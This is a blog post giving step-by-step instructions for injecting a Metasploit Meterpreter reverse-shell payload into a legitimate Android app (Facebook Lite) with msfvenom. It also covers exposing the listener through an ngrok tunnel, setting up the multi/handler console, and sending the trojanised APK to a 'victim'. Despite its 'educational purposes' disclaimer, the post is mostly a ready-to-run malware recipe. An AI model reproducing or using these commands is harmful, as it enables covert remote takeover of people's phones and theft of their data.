How to inject Payload into APK in 10 minutes Using Metasploit (Gaining Access to Android)

android, gaining access, Metasploit 2 Minutes

A Guide to gaining access to most android devices (Ethically) by sending an apk file

WARNING !

  • DO NOT USE THIS METHOD FOR ANY ILLEGAL ACCESS (THAT CAN PUT U IN JAIL).
  • THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.
  • I’M NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITY YOU DO
  • YOU MUST HAVE WRITTEN PERMISSION TO USE IT ON ANYONE
  • USE IT AT UR OWN RISK

^READ THE WARNING BEFORE U CONTINUE^

WHAT WILL WE NEED

We will need

  • Metasploit (of course)
  • apktool
  • default-jdk
  • default-jre
  • zipalign
  • THE APK FILE THAT THE PAYLOAD WILL BE INJECTED INTO
  • Ngrok (if u want to use the apk outside the local network)

INSTALL EVERYTHING

we will simply run that command in the terminal to install everything

sudo apt update && sudo apt upgrade -y && sudo apt install metasploit-framework apktool default-jdk default-jre zipalign -y

If you want to use the APK outside the local network use ngrok (if you don’t know how to set it up i’v got u covered, i wrote an post about that HERE )

INJECTING PAYLOAD INTO APK

after installing everything it’s time to create our malware

at first we will download the apk we want from the internet (ex. APKPURE )

i will take in this example facebook lite and i will rename it to fb-lite.apk

At first i will start up Ngrok using

./ngrok tcp 4444

it gave me a host and a port lets say for example

  • the hostname is : tcp://1.tcp.ngrok.io
  • the port is : 10853

Dont CLOSE Ngrok

Note that we can use our local ip also (we can get it by typing the command : ifconfig in the terminal and use the inet that isnt 127.0.0.1 & 0.0.0.0 and will likely look like that 192.168.1.1)

Now we have our apk (fb-lite.apk) and our host ip (tcp://1.tcp.ngrok.io) & our port (10853) and we want to save the malware to a file named (fb-malware.apk)

we will type in the terminal

sudo msfvenom -x fb-lite.apk -p android/meterpreter/reverse_tcp LHOST=tcp://1.tcp.ngrok.io LPORT=10853 -o fb-malware.apk

now wait about five minutes……….

now we have our malware, go send it to the victim(myself in this case )

now lets setup a listener using metasploit

open the terminal and type out this commands one by one

msfconsole
banner
use /multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

Now we wait until the victim installs and opens the app and we now we are in

and u now have the access u wanted

If it worked give me a comment below and i hope i make a difference in somebody’s life

stay in touch for the automated way without having to enter any command ^^ i will put its link here when its live

bye

Unknown's avatar

Published by DaRkToNe

Published

Leave a comment